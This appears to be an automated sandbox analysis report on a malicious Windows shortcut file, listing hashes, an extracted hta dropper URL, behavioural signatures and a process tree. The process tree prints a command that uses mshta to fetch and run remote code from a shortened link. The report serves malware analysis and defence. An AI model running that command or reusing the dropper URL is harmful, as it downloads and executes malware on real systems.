Overview

overview

10

Static

static

1

09bca3ddbc...1c.lnk

windows7-x64

10

09bca3ddbc...1c.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    91s
  • max time network
    127s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-04-2024 09:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    09bca3ddbc55f22577d2f3a7fda22d1c.lnk

  • Size

    1KB

  • MD5

    09bca3ddbc55f22577d2f3a7fda22d1c

  • SHA1

    bc608400f9fc6c34f7ab230ee71a42920e90c9e7

  • SHA256

    9ab13bfc2c60c1c15e677df76e8768e054d01d24f095cecf752491f785babc0b

  • SHA512

    77ff79364d388489eb7814f3332629e242d0a77878c1b4c79eb26a1bf24a023417bf9b2fc9888c96139903ae50fa34484088776c297605a398631bb9af7f4efc

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://bit.ly/2U1JjGq

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\09bca3ddbc55f22577d2f3a7fda22d1c.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1408
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://bit.ly/2U1JjGq
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3748
      • C:\Windows\System32\mshta.exe
        C:\Windows\System32\mshta https://bit.ly/2U1JjGq
        3⤵
        • Blocklisted process makes network request
        PID:2960

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads